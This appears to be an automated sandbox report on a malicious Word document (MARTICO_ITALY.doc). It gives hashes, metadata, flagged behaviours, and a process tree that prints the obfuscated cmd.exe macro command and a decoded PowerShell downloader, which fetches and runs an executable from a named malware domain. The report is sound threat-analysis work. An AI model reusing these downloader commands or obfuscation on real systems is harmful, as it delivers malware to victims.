analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | MARTICO_ITALY.doc |
| Full analysis: | https://app.any.run/tasks/0f426abf-e30b-4dac-b5aa-23ed285f15d4 |
| Verdict: | Malicious activity |
| Analysis date: | December 06, 2018, 09:43:36 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 3 21:30:00 2018, Last Saved Time/Date: Mon Dec 3 21:30:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 18, Security: 0 |
| MD5: | 1F59C72BF20F7292A09CB1887EFE1DFD |
| SHA1: | FEAD6B87D29AE5C6840AC7698565884E674FF21C |
| SHA256: | CF6602579C22146AB039A5729D93B4F913DEFA56174B914E5EA7815AB376507D |
| SSDEEP: | 1536:INVczHkD9icmT+FFd1+a91+IgyBSu8LSE3B:In/iKFP+IFBSuiSE3B |
MALICIOUS
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 2872)
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 2872)
Executes PowerShell scripts
- cmd.exe (PID: 4064)
SUSPICIOUS
Starts CMD.EXE for commands execution
- cmd.exe (PID: 3468)
- cmd.exe (PID: 4064)
Application launched itself
- cmd.exe (PID: 4064)
Creates files in the user directory
- powershell.exe (PID: 416)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2872)
Creates files in the user directory
- WINWORD.EXE (PID: 2872)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| CompObjUserType: | Microsoft Word 97-2003 Document |
|---|---|
| CompObjUserTypeLen: | 32 |
| HeadingPairs: |
|
| TitleOfParts: | - |
| HyperlinksChanged: | No |
| SharedDoc: | No |
| LinksUpToDate: | No |
| ScaleCrop: | No |
| AppVersion: | 16 |
| CharCountWithSpaces: | 20 |
| Paragraphs: | 1 |
| Lines: | 1 |
| Company: | - |
| CodePage: | Windows Cyrillic |
| Security: | None |
| Characters: | 18 |
| Words: | 3 |
| Pages: | 1 |
| ModifyDate: | 2018:12:03 21:30:00 |
| CreateDate: | 2018:12:03 21:30:00 |
| TotalEditTime: | - |
| Software: | Microsoft Office Word |
| RevisionNumber: | 1 |
| LastModifiedBy: | - |
| Template: | Normal.dotm |
| Comments: | - |
| Keywords: | - |
| Author: | - |
| Subject: | - |
| Title: | - |
Total processes
36
Monitored processes
5
Malicious processes
3
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2872 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\MARTICO_ITALY.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 3468 | c:\XbYKiWzkb\wjzEotZdpQBlTG\wvwNDbNcHZmq\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set qzN=pZC;Y(0'l[?a=v,QKGxW(zV'bWG=^<M]B?:-F1i`cNHG$xnl}4i+}8zn{(E,h(qic\S0tNR+aJ#PcN5p}o1l}\kx;]0Bkb(8aUhbe)d9r_k+bLCj;^&SC'.$2AXJzZJ$2ZjBI'$1d=NX$mLP,Kt;Rt\(u$%3c;5\PF0MYq(Y)sT?^|$pE( y^|^>m}4ReP?RtYlSIS]^&-USOe*unkm]Lo_LTv[UmnDi@I\9K{^>b- uM{)\kl0r4W08?H0^|F40]aq88z_ `uleil`ga%e-ST7 wB0h,Ibt%M'g)S_n0t)e6*HlpJ`.XCN)EXCFH\wqCvus 0#$_a^& ;KDmcqJeUzatSuvIj]d-N$Zt3RKe{VLGoYt(X6r(?;e %}\fst,IT(:;PK^>'Pk5Z%_sS^|oaoF9^>'n*a=#ICl],VifV9z^&,$jwa;Q/())j=F2gVqK.%s;pL$xA~ 0T],2NKpxyLKC$BAB?y$-:u(O~Qe7\qllRPiwqnFQHrdf}^&aWbKoC5Dlo1Nn5-=wd{ro@E\DT B.`YZQ9(Ot~yDYu(7$zxT{*;RyZ8=rmPutEDl{XEl)Kf@z=^<PB\7ZmgB[$^<cI _T;n~+vi@L3 .%5p-UzKV(AAT2E$17(shHh4#tc$9XaNIWe.Pmr/y+o2Egfg#;;OJo'W6)eMhzxgShe:4^<.qtA'bO`+o=^>qTbPzCOfz+}j$k$~+='x'OS^<\qY%'oP9+jQWp53OmJ=\eS`ttg)X:rtIvft_ns)]eo?I$WXA=nzIFk@^&qAzas-bY$Iom;Dj['@Y,z_A'h`@Dk([O'dvS=\/DI(+UH1#7alCI$U95;q34'51;99BV45^&$7}]{'Cy+ $g,=wkv j(hq%Gdz7IVzkJe$[?(;Wf ''b(J(-IR@'jEfn]'N.I=Sk:jG^|jz5W?wk`G${SU;;F?)9#^|'q%+@/l*'yT}( JEt@*ti4T)l(*Mp#./Sz$l.qE''nMmnrVik=_Ft*2d.F5A5c%^<k4ghmyfvy[wVg{^&4=q:,leh4?^>Dvp^>s}h@rsp^&Bc.f^&Kz97~ym+`uY]9iJa;d7V=/p0\Zo@;H{'AKS{M/M+-mo84oQC\c[^>P.I*Ne*^<thVa5rocAoX\Uc8w9yEr=s]3@pLkmy~kms/+F/.I9/6G-:YZKpXk{t]ZLtqe1hC7v', T=@A[z\@^|BxJ_msm)$}:C;_y t2UOn6rpeqC7ifZ$lr{GCJ:yb*38ewqHWe`G.O.)tJ?(eWG=N:zb Qn4t]phca};e[^|6jNl;bHR@o_4N-RN3w=T[ekW,nbSe=?dGQ]b^&tI$AYW(G$X)y;)Y/'L\.I?iem1^|uI;I2'f^|3=f_pTJA:l5\2Z%2/f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&for /L %7 in (1335,-4,3)do set sY=!sY!!qzN:~%7,1!&&if %7==3 echo !sY:*sY!=! |powershell -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 4064 | CmD /V:O/C"set qzN=pZC;Y(0'l[?a=v,QKGxW(zV'bWG=^<M]B?:-F1i`cNHG$xnl}4i+}8zn{(E,h(qic\S0tNR+aJ#PcN5p}o1l}\kx;]0Bkb(8aUhbe)d9r_k+bLCj;^&SC'.$2AXJzZJ$2ZjBI'$1d=NX$mLP,Kt;Rt\(u$%3c;5\PF0MYq(Y)sT?^|$pE( y^|^>m}4ReP?RtYlSIS]^&-USOe*unkm]Lo_LTv[UmnDi@I\9K{^>b- uM{)\kl0r4W08?H0^|F40]aq88z_ `uleil`ga%e-ST7 wB0h,Ibt%M'g)S_n0t)e6*HlpJ`.XCN)EXCFH\wqCvus 0#$_a^& ;KDmcqJeUzatSuvIj]d-N$Zt3RKe{VLGoYt(X6r(?;e %}\fst,IT(:;PK^>'Pk5Z%_sS^|oaoF9^>'n*a=#ICl],VifV9z^&,$jwa;Q/())j=F2gVqK.%s;pL$xA~ 0T],2NKpxyLKC$BAB?y$-:u(O~Qe7\qllRPiwqnFQHrdf}^&aWbKoC5Dlo1Nn5-=wd{ro@E\DT B.`YZQ9(Ot~yDYu(7$zxT{*;RyZ8=rmPutEDl{XEl)Kf@z=^<PB\7ZmgB[$^<cI _T;n~+vi@L3 .%5p-UzKV(AAT2E$17(shHh4#tc$9XaNIWe.Pmr/y+o2Egfg#;;OJo'W6)eMhzxgShe:4^<.qtA'bO`+o=^>qTbPzCOfz+}j$k$~+='x'OS^<\qY%'oP9+jQWp53OmJ=\eS`ttg)X:rtIvft_ns)]eo?I$WXA=nzIFk@^&qAzas-bY$Iom;Dj['@Y,z_A'h`@Dk([O'dvS=\/DI(+UH1#7alCI$U95;q34'51;99BV45^&$7}]{'Cy+ $g,=wkv j(hq%Gdz7IVzkJe$[?(;Wf ''b(J(-IR@'jEfn]'N.I=Sk:jG^|jz5W?wk`G${SU;;F?)9#^|'q%+@/l*'yT}( JEt@*ti4T)l(*Mp#./Sz$l.qE''nMmnrVik=_Ft*2d.F5A5c%^<k4ghmyfvy[wVg{^&4=q:,leh4?^>Dvp^>s}h@rsp^&Bc.f^&Kz97~ym+`uY]9iJa;d7V=/p0\Zo@;H{'AKS{M/M+-mo84oQC\c[^>P.I*Ne*^<thVa5rocAoX\Uc8w9yEr=s]3@pLkmy~kms/+F/.I9/6G-:YZKpXk{t]ZLtqe1hC7v', T=@A[z\@^|BxJ_msm)$}:C;_y t2UOn6rpeqC7ifZ$lr{GCJ:yb*38ewqHWe`G.O.)tJ?(eWG=N:zb Qn4t]phca};e[^|6jNl;bHR@o_4N-RN3w=T[ekW,nbSe=?dGQ]b^&tI$AYW(G$X)y;)Y/'L\.I?iem1^|uI;I2'f^|3=f_pTJA:l5\2Z%2/f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&for /L %7 in (1335,-4,3)do set sY=!sY!!qzN:~%7,1!&&if %7==3 echo !sY:*sY!=! |powershell -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 3900 | C:\Windows\system32\cmd.exe /S /D /c" echo $ZlT='ImI';$YtQ=new-object Net.WebClient;$mBz='http://sypsycorhe.com/KHZ/diuyz.php?l=gymk5.tkn'.Split('@');$wzj='ERJ';$zzq = '749';$aHI='khz';$sqF=$env:temp+'\'+$zzq+'.exe';foreach($AKp in $mBz){try{$YtQ.DownloadFile($AKp, $sqF);$zil='oSZ';If ((Get-Item $sqF).length -ge 80000) {Invoke-Item $sqF;$tKm='ZZA';break;}}catch{}}$cFB='WQa'; " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
| 416 | powershell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
Total events
1 200
Read events
798
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
2
Text files
2
Unknown types
4
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2872 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR96D7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ZQPAWK6269AWWP7DO0H.temp | — | |
MD5:— | SHA256:— | |||
| 416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19abe6.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
| 2872 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\MARTICO_ITALY.doc.LNK | lnk | |
MD5:A21EF63B3A21C8CE923684F7E74AC774 | SHA256:F1992B990EECCB3125245F970B8DCA089BFFD191EF57E44BB3532CDD417B8A19 | |||
| 2872 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:BD0C7930D8DC3EB288A7DEC10348A703 | SHA256:F425D264A54DBC885D3CD003B21475A5E52A56452AEE9D4E3417FD1676FCFAB9 | |||
| 416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
| 2872 | WINWORD.EXE | C:\Users\admin\Desktop\~$RTICO_ITALY.doc | pgc | |
MD5:2FAB61D756C01B101663B6810385592E | SHA256:F761E61830A8809B2B828F7FD6D8E9E8CA86C56A2EE0EFFF7ED0FE218EE2E58F | |||
| 2872 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:5D7AC8BDDFBCBC8C130D003F0258BE43 | SHA256:9EA7F23EBC54872822064EFBF391EE722B56CD995B5E7E5D56A25234A9FB284D | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
DNS requests
Domain | IP | Reputation |
|---|---|---|
sypsycorhe.com |
| unknown |